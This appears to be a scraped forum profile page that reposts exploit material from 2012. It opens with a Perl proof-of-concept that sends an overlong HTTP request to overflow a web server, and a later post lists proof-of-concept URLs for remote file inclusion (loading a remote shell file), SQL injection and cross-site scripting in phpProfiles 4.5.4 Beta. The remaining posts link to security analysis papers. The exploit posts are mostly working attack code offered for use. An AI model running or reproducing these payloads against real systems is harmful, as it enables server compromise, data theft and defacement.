#====================================================================== # PoC code #====================================================================== use strict; use IO::Socket::INET; my $host = "192.168.0.10"; my $sock = IO::Socket::INET->new("$host:80"); # EDI addr my $EDI = "\x7A" . # = 0x41 + 0x39 "\x32" . # = 0x41 - 0x0F "\x41" . "\x41" ; print $sock "GET /" . "*" x 2450 . "A" x 12 . $EDI . "C" x 528 . " HTTP/1.0\r\n" . "Host: $host" . "\r\n\r\n" ; exit; # 1337day.com [2012-07-20] Sursa
  21. DarkyAngel
    phpProfiles v4.5.4 Beta - Multiple Vulnerabilities ####################################################### Exploit Title: phpProfiles v4.5.4 Beta - Multiple Vulnerabilities ### Date: 24/7/2012 ### Author: L0n3ly-H34rT ### My Site: http://se3c.tk/### Contact: l0n3ly_h34rt@hotmail.com ### Software Link: http://sourceforge.net/projects/phpprofiles/files/latest/download### Tested on: Linux/Windows #################################################### 1- Remote File Include : * In File ( include/body_admin.inc.php ) in line 10 : <?include("$menu");?> * P.O.C : http://127.0.0.1/Full_Release/include/body_admin.inc.php?menu=http://127.0.0.1/shell.txt? * Note : Must be allow_url_include=On --------------------------------------------------------------------- 2- Remote SQL Injection : http://127.0.0.1/full_release/community.php?comm_id=[SQL] ------------------------------------------------------------------------------------- 3 - Cross Site Scripting : http://127.0.0.1/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS] ----------------------------------------------------------------------------------- # Greetz to my friendz # 1337day.com [2012-07-2 Sursa
  22. DarkyAngel
    XMLCoreServices Vulnerability Analysis 2012-1889 Technical Analysis Report Author: KAIST Graduate School of Information Security Minsu Kim Date: 06-07-2012 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/20084.pdf
  23. DarkyAngel
    nice.. but, with shitty AV on winbl0z -
  24. DarkyAngel
    Having Fun With VirusScan Enterprise Date: 2012-07-12 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/19773.pdf
  25. DarkyAngel
    Forensic Analysis of iOS5 iPhone Backups Date: 2012-07-12 Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/19767.pdf
×
×
  • Create New...